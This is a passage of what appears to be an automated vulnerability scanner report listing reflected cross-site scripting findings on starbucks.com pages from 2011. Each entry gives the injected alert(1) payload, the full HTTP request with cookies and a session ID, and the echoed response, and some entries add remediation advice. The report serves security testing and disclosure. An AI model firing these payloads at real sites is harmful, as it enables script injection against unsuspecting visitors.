1.903. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/starbucks-red
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3411b"%3balert(1)//7724a630612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3411b";alert(1)//7724a630612 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /responsibility/community/starbucks-red?3411b"%3balert(1)//7724a630612=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:14:20 GMT Connection: close Content-Length: 41834
1.904. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/youth-action
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c5f1"style%3d"x%3aexpression(alert(1))"fee707305da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c5f1"style="x:expression(alert(1))"fee707305da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community/youth-action?6c5f1"style%3d"x%3aexpression(alert(1))"fee707305da=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:14:25 GMT Connection: close Content-Length: 40145
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/youth-action?6c5f1"style="x:expression(alert(1))"fee707305da=1"/> ...[SNIP]...
1.905. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/youth-action
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bc26"%3balert(1)//a20621fb850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6bc26";alert(1)//a20621fb850 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /responsibility/community/youth-action?6bc26"%3balert(1)//a20621fb850=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:14:26 GMT Connection: close Content-Length: 40050
1.906. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/diversity
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2434"style%3d"x%3aexpression(alert(1))"9d972ae0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2434"style="x:expression(alert(1))"9d972ae0d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/diversity?b2434"style%3d"x%3aexpression(alert(1))"9d972ae0d9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:54 GMT Connection: close Content-Length: 38155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/diversity?b2434"style="x:expression(alert(1))"9d972ae0d9=1"/> ...[SNIP]...
1.907. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/diversity/suppliers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ab1f"style%3d"x%3aexpression(alert(1))"18d18debd9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ab1f"style="x:expression(alert(1))"18d18debd9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/diversity/suppliers?2ab1f"style%3d"x%3aexpression(alert(1))"18d18debd9f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:17:09 GMT Connection: close Content-Length: 39052
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/diversity/suppliers?2ab1f"style="x:expression(alert(1))"18d18debd9f=1" /> ...[SNIP]...
1.908. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/environment
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74254"style%3d"x%3aexpression(alert(1))"cd978537e36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74254"style="x:expression(alert(1))"cd978537e36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/environment?74254"style%3d"x%3aexpression(alert(1))"cd978537e36=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:15:58 GMT Connection: close Content-Length: 50714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/environment?74254"style="x:expression(alert(1))"cd978537e36=1"/> ...[SNIP]...
1.909. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/environment/climate-change
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8714c"style%3d"x%3aexpression(alert(1))"f8e10288012 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8714c"style="x:expression(alert(1))"f8e10288012 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/environment/climate-change?8714c"style%3d"x%3aexpression(alert(1))"f8e10288012=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:48 GMT Connection: close Content-Length: 40326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/environment/climate-change?8714c"style="x:expression(alert(1))"f8e10288012=1"/> ...[SNIP]...
1.910. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/environment/energy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bfc"style%3d"x%3aexpression(alert(1))"c24986dd6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59bfc"style="x:expression(alert(1))"c24986dd6f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/environment/energy?59bfc"style%3d"x%3aexpression(alert(1))"c24986dd6f7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:26 GMT Connection: close Content-Length: 39146
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/environment/energy?59bfc"style="x:expression(alert(1))"c24986dd6f7=1"/> ...[SNIP]...
1.911. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/environment/explore-green-store
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be99d"style%3d"x%3aexpression(alert(1))"dce46789f55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be99d"style="x:expression(alert(1))"dce46789f55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/environment/explore-green-store?be99d"style%3d"x%3aexpression(alert(1))"dce46789f55=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:15 GMT Connection: close Content-Length: 36700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/environment/explore-green-store?be99d"style="x:expression(alert(1))"dce46789f55=1" /> ...[SNIP]...
1.912. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/environment/green-building
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81427"style%3d"x%3aexpression(alert(1))"70b16b5ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81427"style="x:expression(alert(1))"70b16b5ded in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/environment/green-building?81427"style%3d"x%3aexpression(alert(1))"70b16b5ded=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:37 GMT Connection: close Content-Length: 40773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/environment/green-building?81427"style="x:expression(alert(1))"70b16b5ded=1"/> ...[SNIP]...
1.913. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/environment/recycling
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8710"style%3d"x%3aexpression(alert(1))"183500e045d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8710"style="x:expression(alert(1))"183500e045d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/environment/recycling?a8710"style%3d"x%3aexpression(alert(1))"183500e045d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:25 GMT Connection: close Content-Length: 43161
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/environment/recycling?a8710"style="x:expression(alert(1))"183500e045d=1"/> ...[SNIP]...
1.914. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/environment/water
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1dc"style%3d"x%3aexpression(alert(1))"3a75d5838b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd1dc"style="x:expression(alert(1))"3a75d5838b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/environment/water?cd1dc"style%3d"x%3aexpression(alert(1))"3a75d5838b9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:30 GMT Connection: close Content-Length: 39187
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/environment/water?cd1dc"style="x:expression(alert(1))"3a75d5838b9=1"/> ...[SNIP]...
1.915. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/learn-more/goals-and-progress
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2e8"style%3d"x%3aexpression(alert(1))"0acfa560360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e2e8"style="x:expression(alert(1))"0acfa560360 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/learn-more/goals-and-progress?4e2e8"style%3d"x%3aexpression(alert(1))"0acfa560360=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:17:18 GMT Connection: close Content-Length: 45450
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/goals-and-progress?4e2e8"style="x:expression(alert(1))"0acfa560360=1" /> ...[SNIP]...
1.916. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/learn-more/policies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dacc1"style%3d"x%3aexpression(alert(1))"58441f58f39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dacc1"style="x:expression(alert(1))"58441f58f39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/learn-more/policies?dacc1"style%3d"x%3aexpression(alert(1))"58441f58f39=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:18:16 GMT Connection: close Content-Length: 38100
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/policies?dacc1"style="x:expression(alert(1))"58441f58f39=1"/> ...[SNIP]...
1.917. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/learn-more/relationships
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39d95"style%3d"x%3aexpression(alert(1))"d979f153017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39d95"style="x:expression(alert(1))"d979f153017 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/learn-more/relationships?39d95"style%3d"x%3aexpression(alert(1))"d979f153017=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:18:16 GMT Connection: close Content-Length: 48018
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/relationships?39d95"style="x:expression(alert(1))"d979f153017=1"/> ...[SNIP]...
1.918. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/learn-more/shared-values-blog
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa51c"style%3d"x%3aexpression(alert(1))"92ca21ea562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa51c"style="x:expression(alert(1))"92ca21ea562 in the application's response.
